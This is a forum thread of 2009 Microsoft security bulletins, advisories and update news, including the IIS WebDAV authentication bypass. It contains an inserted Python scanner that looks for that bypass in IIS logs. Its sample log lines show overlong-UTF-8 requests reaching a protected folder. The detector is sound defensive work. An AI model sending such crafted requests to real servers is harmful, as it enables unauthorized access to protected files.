April 10, 2009 IEBlog - "... Starting on or about the third week of April, users still running IE6 or IE7 on Windows XP, Windows Vista, Windows Server 2003, or Windows Server 2008 will get a notification through Automatic Update about IE8. This rollout will start with a narrow audience and expand over time to the entire user base. On Windows XP and Server 2003, the update will be High-Priority. On Windows Vista and Server 2008 it will be Important. IE8 will not automatically install on machines. Users must opt-in to install IE8. Users will see a Welcome screen that offers choices: Ask later, install now, or don’t install. Users who decline the automatic update can still download it from http://www.microsoft.com/ie8 or from Windows Update as an optional update... If an organization uses Automatic Update to keep Windows up-to-date but wants to manage its own deployment of IE8, a free Blocker Toolkit* is available that will block automatic delivery of IE8. This blocker toolkit was released in January 2009 and has no expiration date..."
* http://preview.tinyurl.com/9yjpqw

:spider::buried:

AplusWebMaster
2009-04-14, 20:27
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-apr.mspx?pf=true
April 14, 2009 - "This bulletin summary lists security bulletins released for April 2009... (Total of -8- )

Critical (5)

Microsoft Security Bulletin MS09-009
Vulnerabilities in Microsoft Office Excel Could Cause Remote Code Execution (968557)
- http://www.microsoft.com/technet/security/bulletin/MS09-009.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS09-010
Vulnerabilities in WordPad and Office Text Converters Could Allow Remote Code Execution (960477)
- http://www.microsoft.com/technet/security/bulletin/MS09-010.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Microsoft Office...

Microsoft Security Bulletin MS09-011
Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution (961373)
- http://www.microsoft.com/technet/security/bulletin/MS09-011.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-013
Vulnerabilities in Windows HTTP Services Could Allow Remote Code Execution (960803)
- http://www.microsoft.com/technet/security/bulletin/MS09-013.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-014
Cumulative Security Update for Internet Explorer (963027)
- http://www.microsoft.com/technet/security/bulletin/MS09-014.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer...

Important (2)

Microsoft Security Bulletin MS09-012
Vulnerabilities in Windows Could Allow Elevation of Privilege (959454)
- http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-016
Vulnerabilities in Microsoft ISA Server and Forefront Threat Management Gateway (Medium Business Edition) Could Cause Denial of Service (961759)
- http://www.microsoft.com/technet/security/bulletin/MS09-016.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: Requires restart
Affected Software: Microsoft Forefront Edge Security...

Moderate (1)

Microsoft Security Bulletin MS09-015
Blended Threat Vulnerability in SearchPath Could Allow Elevation of Privilege (959426)
- http://www.microsoft.com/technet/security/bulletin/MS09-015.mspx
Maximum Severity Rating: Moderate
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

- http://blogs.technet.com/msrc/archive/2009/04/14/april-2009-monthly-bulletin-release.aspx
April 14, 2009
___

MSRT - April 2009
- http://support.microsoft.com/?kbid=890830
April 14, 2009 - Revision: 58.0
(Recent adds)
Win32/Conficker - January 2009 (V 2.6) High
Win32/Srizbi - February 2009 (V 2.7) Moderate
Win32/Koobface - March 2009 (V 2.8) Moderate
Win32/Waledac - April 2009 (V 2.9) Moderate
Download: http://preview.tinyurl.com/6bb67
___

ISC Analysis (includes CVE links)
- http://isc.sans.org/diary.html?storyid=6193
Last Updated: 2009-04-15 02:14:16 UTC ...
___

- http://preview.tinyurl.com/cnylhb
April 14, 2009 (Computerworld) - 10 of the 23 vulnerabilities have already been exploited or are public...

.

AplusWebMaster
2009-04-15, 13:43
FYI...

Microsoft Security Advisory (968272)
Vulnerability in Microsoft Office Excel Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/968272.mspx
Published: February 24, 2009 | Updated: April 14, 2009 - "... We have issued MS09-009 to address this issue..."
- http://www.microsoft.com/technet/security/bulletin/MS09-009.mspx

Microsoft Security Advisory (960906)
Vulnerability in WordPad Text Converter Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/960906.mspx
Published: December 9, 2008 | Updated: April 14, 2009 - "... We have issued MS09-010 to address this issue..."
- http://www.microsoft.com/technet/security/bulletin/MS09-010.mspx

Microsoft Security Advisory (953818)
Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform
- http://www.microsoft.com/technet/security/advisory/953818.mspx
Published: May 30, 2008 | Updated: April 14, 2009 - "... Customers running Safari on Windows should review this advisory. We have issued Microsoft Security Bulletin MS09-014, Cumulative Security Update for Internet Explorer (963027), and MS09-015, Blended Threat Vulnerability in SearchPath Could Allow Elevation of Privilege (959426), to address this issue. For more information about this issue, including download links for security updates, please review MS09-014 and MS09-015.
- http://www.microsoft.com/technet/security/Bulletin/ms09-014.mspx
- http://www.microsoft.com/technet/security/Bulletin/ms09-015.mspx
Apple Support has released a security advisory that addresses the vulnerability in Apple’s Safari 3.1.2 for Windows. Please see Apple security advisory About the security content of Safari 3.1.2 for Windows for more information.
- http://support.apple.com/kb/HT2092
Mitigating Factors:
• Customers who have changed the default location where Safari downloads content to the local drive are not affected by this blended threat..."

Microsoft Security Advisory (951306)
Vulnerability in Windows Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/951306.mspx
Published: April 17, 2008 | Updated: April 14, 2009 - "... We have issued MS09-012 to address this issue..."
- http://www.microsoft.com/technet/security/Bulletin/ms09-012.mspx

:fear:

AplusWebMaster
2009-04-29, 15:05
FYI...

IEv8 now pushed...
- http://isc.sans.org/diary.html?storyid=6283
Last Updated: 2009-04-28 23:55:01 UTC - "If you were to go to your "Windows Update..." feature today, you will see that IE8 is now available as a "critical" update to your Microsoft OS..."

Internet Explorer 8 for Windows XP
Date last published: 4/28/2009
Download size: 16.1 MB

:lip:

AplusWebMaster
2009-04-29, 22:34
FYI...

MS Office 2007 SP2 released
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=217200466
April 28, 2009 - "The productivity suite update adds built-in support for Open Document Format and a slew of other tweaks, including improved Outlook performance... The new service pack became available as a manual download* Tuesday. It won't become an automatic update for another 90 days, and then only with a 30-day notice."
* http://preview.tinyurl.com/cfq34v
Knowledge Base (KB) Articles: http://support.microsoft.com/kb/953195
Date Published: 4/24/2009
290.2 MB

>> Note: Several reports found both the IEv8 and MS Office 2007 SP2 updates available on the MS Update site.

- http://jkontherun.com/2009/04/30/office-2007-sp2-breaking-corporate-email/
April 30, 2009 - "... a number of corporate users are experiencing a major bug in SP2 that affects the ability to access the Global Address Book, effectively rendering corporate email useless. One corporate user says the problem went away when Office 2007 SP2 was removed..."

:lip:

AplusWebMaster
2009-04-30, 17:43
FYI...

MS Security Bulletin revisions to:

• MS09-012 - Important
- http://www.microsoft.com/technet/security/bulletin/ms09-012.mspx
• -V2.0- (April 29, 2009): Added an entry to the section, Frequently Asked Questions (FAQ) Related to This Security Update to communicate the rerelease of the Norwegian-language update for Microsoft Windows 2000 Service Pack 4 (KB952004). Customers who require the Norwegian-language update need to download and install the rereleased update. No other updates or locales are affected by this rerelease.

• MS08-076 - Important
- http://www.microsoft.com/technet/security/bulletin/ms08-076.mspx
• -V4.0- (April 29, 2009): Added Windows Media Services 2008 (KB952068) on 32-bit and x64-based editions of Windows Server 2008 Service Pack 2 as affected software. Also, added Windows Server 2008 for Itanium-based Systems Service Pack 2 as non-affected software. This is a detection change only; there were no changes to the binaries. Customers who have already successfully installed KB952068 do not need to reinstall.

• MS08-069 - Critical
- http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx
• -V2.0- (April 29, 2009): Added Microsoft XML Core Services 4.0 (KB954430) on 32-bit and x64-based editions of Windows Vista Service Pack 2 and on 32-bit, x64-based, and Itanium-based editions of Windows Server 2008 Service Pack 2 as affected software. Also added as non-affected software: Microsoft XML Core Services 3.0 and Microsoft XML Core Services 6.0 on 32-bit and x64-based editions of Windows Vista Service Pack 2 and on 32-bit, x64-based, and Itanium-based editions of Windows Server 2008 Service Pack 2. This is a detection change only; there were no changes to the binaries. Customers who have already successfully installed KB954430 do not need to reinstall.

:fear:

AplusWebMaster
2009-05-08, 04:21
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-may.mspx
May 7, 2009 - "This is an advance notification of security bulletins that Microsoft is intending to release on May 12, 2009..."
(Total of -1-)

Critical (1)

PowerPoint
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

- http://www.us-cert.gov/current/index.html#microsoft_releases_advance_notification_for21
May 7, 2009

.

AplusWebMaster
2009-05-12, 20:57
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-may.mspx
May 12, 2009 - "This bulletin summary lists security bulletins released for May 2009...
(Total of -1-)

Critical

Microsoft Security Bulletin MS09-017 - Critical
Vulnerabilities in Microsoft Office PowerPoint Could Allow Remote Code Execution (967340)
- http://www.microsoft.com/technet/security/bulletin/ms09-017.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

- http://secunia.com/advisories/32428/2/
Last Update: 2009-05-13
Critical: Highly critical

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0220
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0221
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0222
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0223
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0224
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0225
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0226
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0227
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0556
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1128
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1129
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1130
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1131
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1137
___

MSRT - May 2009
- http://support.microsoft.com/?kbid=890830
May 12, 2009 - Revision: 59.0
(Recent adds)...
Win32/Koobface March 2009 (V 2.8) Moderate
Win32/Waledac April 2009 (V 2.9) Moderate
Win32/Winwebsec May 2009 (V 2.10) Moderate ...
Download: http://preview.tinyurl.com/6bb67
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=6376
Last Updated: 2009-05-12 17:47:16 UTC

AplusWebMaster
2009-05-13, 18:50
FYI...

Microsoft Security Advisory (969136)
Vulnerability in Microsoft Office PowerPoint Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/969136.mspx
Updated: May 12, 2009 - "...We have issued MS09-017* to address this issue..."
* http://www.microsoft.com/technet/security/bulletin/ms09-017.mspx

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0556

// At least one of the vulnerabilities is actively being exploited in the wild.

AplusWebMaster
2009-05-15, 18:43
FYI...

- http://pandalabs.pandasecurity.com/archive/MS08_2D00_066-in-the-wild.aspx
14 May 09 - "... use Windows with a regular user account, in order to avoid most of the malware actions that require admin rights (install rootkits, modify system files, registry or services,…). However it’s really important to keep our system updated. You should install Windows updates every month because even if your default Windows user hasn’t got admin privileges, you could still have problems if you execute a malware... With this piece of code, if the system hasn’t been updated with the MS08-066* patch, the malware would be able to do whatever it wants..."
* http://www.microsoft.com/technet/security/bulletin/ms08-066.mspx
Vuln in the MS Ancillary Function Driver Could Allow Elevation of Privilege (956803)
... Why was this security bulletin revised on January 13, 2009?
Microsoft revised this security bulletin to announce a detection change for this security update. As a result of the correction, the detection offers the security update to affected systems that previously were not offered this security update....
- http://support.microsoft.com/kb/956803

(More detail available at the PandaLabs URL above.)

:fear::fear:

AplusWebMaster
2009-05-16, 16:46
FYI...

- http://www.symantec.com/security_response/threatconlearn.jsp
May 16, 2009 - "The ThreatCon is currently at Level 2: Elevated... A newly discovered and unpatched flaw has been disclosed affecting Microsoft IIS 6 with WebDAV enabled. Due to an error in the way unicode characters are handled, it is possible for an attacker to bypass authentication requirements when accessing a protected resource. It may also be possible for attackers to upload files to a vulnerable server without supplying credentials. Due to the nature of this flaw and the ease with which it can be triggered, we feel that it is probable that attacks will be carried out in the wild. Reports indicate that Microsoft IIS 7 is not vulnerable. More information is available in the following BID: Microsoft IIS Unicode Requests to WebDAV Multiple Authentication Bypass Vulnerabilities
http://www.securityfocus.com/bid/34993 ..."

- http://isc.sans.org/diary.html?storyid=6397
Last Updated: 2009-05-16 00:05:27 UTC - "... adding certain Unicode characters to a URL makes it possible to bypass authentication in Microsoft IIS6 with WebDAV and access or even upload files in folders which are supposed to be password protected... If you have WebDAV active and accessible from the Internet on any of your IIS6, it is probably a wise move to hedge and turn WebDAV off..."
- http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html

- http://secunia.com/advisories/35109/2/
Release Date: 2009-05-18
Critical: Moderately critical
Impact: Security Bypass
Where: From remote
Solution Status: Unpatched
Software: Microsoft Internet Information Services (IIS) 5.x, Microsoft Internet Information Services (IIS) 6
Solution: Do not store sensitive files inside the webroot. Disable WebDAV support...

:fear::fear:

AplusWebMaster
2009-05-19, 12:48
FYI...

Microsoft Security Advisory (971492)
Vulnerability in Internet Information Services Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/971492.mspx
May 18, 2009 - "Microsoft is investigating new public reports of a possible vulnerability in Microsoft Internet Information Services (IIS). An elevation of privilege vulnerability exists in the way that the WebDAV extension for IIS handles HTTP requests. An attacker could exploit this vulnerability by creating a specially crafted anonymous HTTP request to gain access to a location that typically requires authentication. We are not aware of attacks that are trying to use this vulnerability or of customer impact at this time. Microsoft is investigating the public reports...
Workarounds:
- Disable WebDAV...
- Alternate method to disable WebDAV on IIS 5.0 and IIS 5.1...
- Alternate method to disable WebDAV on IIS 5.1 and IIS 6.0...
- Change file system ACLs to deny access to the anonymous user account...

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1676
Last revised: 05/20/2009
CVSS v2 Base Score: 7.6 (HIGH)

> http://blogs.technet.com/srd/archive/2009/05/18/more-information-about-the-iis-authentication-bypass.aspx
May 18, 2009

Understanding Microsoft's KB971492 IIS5/IIS6 WebDAV Vulnerability
- http://unixwiz.net/techtips/ms971492-webdav-vuln.html
26 May 2009

:fear:
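The advisory above describes anonymous HTTP requests reaching locations that normally require authentication, and the earlier reports tie it to Unicode characters in the URL. The Python script below is an added example, not part of the original post or of Microsoft's advisory: it scans IIS W3C extended log lines for two signals of that pattern, an anonymous 2xx response under a directory that elsewhere answered 401, and a URI stem that percent-decodes to invalid UTF-8 (for instance an overlong sequence, which a strict decoder rejects). The field list, the log lines and the overlong sequence in them are constructed for this example; the heuristics are an assumption about how such a bypass shows up in logs, not a signature taken from the advisory.

```python
"""Heuristic scan of IIS W3C extended logs for WebDAV authentication-bypass
patterns: anonymous requests that succeed under a directory that otherwise
demanded authentication, and URI stems carrying invalid (e.g. overlong) UTF-8.
Assumption: the log uses the field order given in its #Fields header."""
from urllib.parse import unquote_to_bytes

WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE",
                  "LOCK", "UNLOCK", "PUT", "DELETE", "SEARCH"}

# Constructed sample log (not real traffic). "%c0%af" is an overlong UTF-8
# encoding of "/", used only as a stand-in for the "certain Unicode
# characters" the reports mention; the checks do not depend on that value.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2009-05-18 10:01:02 10.0.0.5 GET /public/index.htm - 80 - 192.0.2.10 Mozilla/4.0 200
2009-05-18 10:01:09 10.0.0.5 GET /protected/report.xls - 80 - 192.0.2.77 Mozilla/4.0 401
2009-05-18 10:01:11 10.0.0.5 GET /protected/report.xls - 80 jsmith 192.0.2.10 Mozilla/4.0 200
2009-05-18 10:02:30 10.0.0.5 PROPFIND /%c0%afprotected/ - 80 - 192.0.2.77 Mozilla/4.0 207
2009-05-18 10:02:31 10.0.0.5 GET /%c0%afprotected/report.xls - 80 - 192.0.2.77 Mozilla/4.0 200
2009-05-18 10:03:00 10.0.0.5 GET /public/caf%c3%a9.htm - 80 - 192.0.2.10 Mozilla/4.0 200
"""


def parse_w3c(text):
    """Return one dict per request line, keyed by the names in the #Fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):
                rows.append(dict(zip(fields, parts)))
    return rows


def decoded_stem(stem):
    """Percent-decode the stem to raw bytes; report whether those bytes are
    valid UTF-8 and return an ASCII-only view (high bytes dropped) so that a
    stem padded with odd encodings can be compared against plain paths."""
    raw = unquote_to_bytes(stem)
    try:
        raw.decode("utf-8")          # strict: overlong/invalid sequences raise
        valid = True
    except UnicodeDecodeError:
        valid = False
    ascii_view = bytes(b for b in raw if b < 0x80).decode("ascii")
    return valid, ascii_view


def protected_dirs(rows):
    """Directories in which an anonymous request was ever refused with 401."""
    dirs = set()
    for r in rows:
        if r["cs-username"] == "-" and r["sc-status"] == "401":
            _, view = decoded_stem(r["cs-uri-stem"])
            d = view.rsplit("/", 1)[0] + "/"
            if d != "/":             # a 401 on the site root would match everything
                dirs.add(d)
    return dirs


def find_suspicious(rows):
    """Flag rows matching any of the bypass heuristics; returns a list of dicts."""
    guarded = protected_dirs(rows)
    findings = []
    for r in rows:
        method, stem = r["cs-method"].upper(), r["cs-uri-stem"]
        anon, status = r["cs-username"] == "-", int(r["sc-status"])
        valid, view = decoded_stem(stem)
        success = 200 <= status < 300   # 207 Multi-Status counts as success for PROPFIND
        reasons = []
        if not valid:
            reasons.append("invalid or overlong UTF-8 in URI stem")
        if anon and success and any(view.startswith(d) for d in guarded):
            reasons.append("anonymous success under a directory that returned 401")
        if anon and success and method in WEBDAV_METHODS:
            reasons.append(f"anonymous WebDAV {method} succeeded")
        if reasons:
            findings.append({"time": f"{r['date']} {r['time']}", "client": r["c-ip"],
                             "method": method, "stem": stem, "status": status,
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(parse_w3c(SAMPLE_LOG)):
        print(f["time"], f["client"], f["method"], f["stem"], f["status"],
              "; ".join(f["reasons"]))
```

Against the sample, only the two anonymous requests from 192.0.2.77 with the malformed stem are reported; the valid UTF-8 in /public/caf%c3%a9.htm is left alone. Read a real log file and pass its text to parse_w3c. An anonymous success under a directory that otherwise returns 401 is the stronger signal; invalid UTF-8 on its own also shows up in scanner noise, so treat it as a lead rather than proof.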

AplusWebMaster
2009-05-21, 00:22
FYI...

- http://www.theregister.co.uk/2009/05/20/iis_bug_fells_university_server/
20 May 2009 - "Hackers have wasted no time targeting a gaping hole in Microsoft's Internet Information Services webserver, according to administrators at Ball State University, who say servers that used the program were breached on Monday... On Monday, Microsoft confirmed what it called an "elevation of privilege vulnerability" in versions 5 and 6 of IIS when it runs an extension known as WebDAV. Microsoft said at the time it was unaware of any in-the-wild exploits of the vulnerability. The assessment was at odds with this warning*..."
* http://www.us-cert.gov/current/index.html#microsoft_internet_information_services_iis
updated May 19, 2009 - "... US-CERT is also aware of publicly available exploit code and active exploitation of this vulnerability... note that disabling WebDAV may affect the functionality of other applications such as SharePoint..."

- http://www.theregister.co.uk/2009/05/21/ball_state_retracts/
21 May 2009 - "Network administrators at Ball State University have retracted their claims that a campus website was brought down by a zero-day vulnerability in Microsoft's Internet Information Services webserver... corrects an advisory campus officials issued Tuesday that claimed the breach was the result of someone targeting a vulnerability in versions 5 and 6 of IIS that allows attackers to list, access, and in some cases upload files in password-protected folders of vulnerable machines. The vulnerability exists when IIS uses the WebDAV protocol. The advisory was featured prominently on the university's website. "Initially, both Microsoft and Ball State suspected the intruder used the WebDAV vulnerability that was made public by Microsoft on May 15," Proudfoot said..."

Corrected CVE:
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1676
Last revised: 05/20/2009
CVSS v2 Base Score: 7.6 (HIGH)

// http://forums.spybot.info/showpost.php?p=312447&postcount=98

AplusWebMaster
2009-05-27, 15:40
FYI...

- http://www.theinquirer.net/inquirer/news/1137482/vista-service-pack-light
26 May 2009 - "... Microsoft has finally released the next official first aid kit for Windows Vista - SP2. If you've been running the BETA of Service Pack 2 that was released last year, then you'll need to uninstall that before installing the official service pack. Plus, you'll also need to have Service Pack 1 installed first. Although the Service Pack hasn't made it to Windows Update yet, you can now grab the official downloads from Microsoft's Download Center. The installer includes Service Pack 2 for both Windows Vista and Windows Server 2008, resulting in a 348.3MB file for 32-bit version - and a 577.4MB file for 64-bit version. Despite the massive file size, however, there's not much to get excited about. The update mainly includes all of the bits and bobs that have been released since Service Pack 1, although this doesn't include Internet Explorer 8..."

- http://technet.microsoft.com/en-us/windows/dd262148.aspx
May 26, 2009

:spider:

AplusWebMaster
2009-05-29, 02:02
FYI...

Microsoft Security Advisory (971778)
Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/971778.mspx
May 28, 2009 - "Microsoft is investigating new public reports of a new vulnerability in Microsoft DirectX. The vulnerability could allow remote code execution if a user opened a specially crafted QuickTime media file. Microsoft is aware of limited, active attacks that use this exploit code. While our investigation is ongoing, our investigation so far has shown that Windows 2000 Service Pack 4, Windows XP, and Windows Server 2003 are vulnerable; all versions of Windows Vista and Windows Server 2008 are not vulnerable... Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers..."

- http://www.theregister.co.uk/2009/05/28/critical_microsoft_directx_vulnerability/
28 May 2009 22:37 GMT - "... Microsoft has offered several work-arounds until a patch is available. The most straight-forward of them involves visiting this link* and clicking on the "Fix it" icon. (We got an error when using Firefox, but it worked fine with Internet Explorer)..."
* http://support.microsoft.com/kb/971778

> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1537

- http://secunia.com/advisories/35268/2/
Release Date: 2009-05-29
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched...
Solution: Disable the parsing of QuickTime content in quartz.dll. Please see the vendor's advisory for more information. Do not browse untrusted websites or follow untrusted links. Do not open untrusted media files...

:fear:

AplusWebMaster
2009-06-04, 13:52
FYI...

Problems confirmed with Vista SP2
- http://windowssecrets.com/comp/090604#known0
2009-06-04

:sad:

AplusWebMaster
2009-06-05, 02:13
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-jun.mspx
June 4, 2009 - "This is an advance notification of security bulletins that Microsoft is intending to release on June 9, 2009...
(Total of -10-)

Critical -6-

Windows 1
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Windows 2
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

IE
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer...

Word
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Excel
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Office
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Important -3-

Windows 3
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Windows 4
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Windows 5
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Moderate -1-

Windows 6
Maximum Severity Rating: Moderate
Vulnerability Impact: Information Disclosure
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

- http://blogs.technet.com/msrc/archive/2009/06/04/june-2009-advance-notification.aspx
June 04, 2009

.

AplusWebMaster
2009-06-09, 20:55
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-jun.mspx
June 9, 2009 - "This bulletin summary lists security bulletins released for June 2009... The following table summarizes the security bulletins for this month in order of severity... (Total of -10-)

Critical -6-

Microsoft Security Bulletin MS09-018
Vulnerabilities in Active Directory Could Allow Remote Code Execution (971055)
- http://www.microsoft.com/technet/security/bulletin/MS09-018.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution, Denial of Service
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-022
Vulnerabilities in Windows Print Spooler Could Allow Remote Code Execution (961501)
- http://www.microsoft.com/technet/security/bulletin/MS09-022.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-019
Cumulative Security Update for Internet Explorer (969897)
- http://www.microsoft.com/technet/security/bulletin/MS09-019.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer ...
- http://atlas.arbor.net/briefs/
"...major update to IE 6, 7 and 8 for all platforms. This could affect thousands of users and, as we have seen, be used in drive by attacks for years to come. Source: MS09-019 ..."

Microsoft Security Bulletin MS09-027
Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (969514)
- http://www.microsoft.com/technet/security/bulletin/MS09-027.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS09-021
Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (969462)
- http://www.microsoft.com/technet/security/bulletin/MS09-021.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS09-024
Vulnerability in Microsoft Works Converters Could Allow Remote Code Execution (957632)
- http://www.microsoft.com/technet/security/bulletin/MS09-024.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Important -3-

Microsoft Security Bulletin MS09-026
Vulnerability in RPC Could Allow Elevation of Privilege (970238)
- http://www.microsoft.com/technet/security/bulletin/MS09-026.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-025
Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (968537)
- http://www.microsoft.com/technet/security/bulletin/MS09-025.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-020
Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483)
- http://www.microsoft.com/technet/security/bulletin/MS09-020.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Moderate -1-

Microsoft Security Bulletin MS09-023
Vulnerability in Windows Search Could Allow Information Disclosure (963093)
- http://www.microsoft.com/technet/security/bulletin/MS09-023.mspx
Maximum Severity Rating: Moderate
Vulnerability Impact: Information Disclosure
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=6538
Last Updated: 2009-06-10 13:01:38 UTC ...(Version: 2)
___

- http://www.reuters.com/article/technologyNews/idUSTRE5585IV20090609?sp=true
Jun 9, 2009 - "Microsoft Corp issued software to fix 31 security flaws in its programs, a single-day record for the company whose products are targeted by hackers because they sit on the vast majority of computers..."
___

MSRT
- http://www.microsoft.com/security/malwareremove/default.mspx
Version: 2.11
Knowledge Base (KB) Articles: http://support.microsoft.com/?kbid=890830
Date Published: 6/9/2009 ...
Recent adds:
Win32/Waledac - April 2009 (V 2.9) Moderate
Win32/Winwebsec - May 2009 (V 2.10) Moderate
Win32/InternetAntivirus - June 2009 (V 2.11) Moderate

AplusWebMaster
2009-06-10, 19:28
FYI...

Microsoft Security Advisory (971888)
Update for DNS Devolution
- http://www.microsoft.com/technet/security/advisory/971888.mspx
Published or Last Updated: 6/9/2009

Microsoft Security Advisory (971492)
Vulnerability in Internet Information Services Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/971492.mspx
Published: May 18, 2009 | Updated: June 9, 2009 - "... We have issued MS09-020 to address this issue..." - http://www.microsoft.com/technet/security/Bulletin/MS09-020.mspx

Microsoft Security Advisory (969898)
Update Rollup for ActiveX Kill Bits
- http://www.microsoft.com/technet/security/advisory/969898.mspx
June 9, 2009 - "Microsoft is releasing a new set of ActiveX kill bits with this advisory.
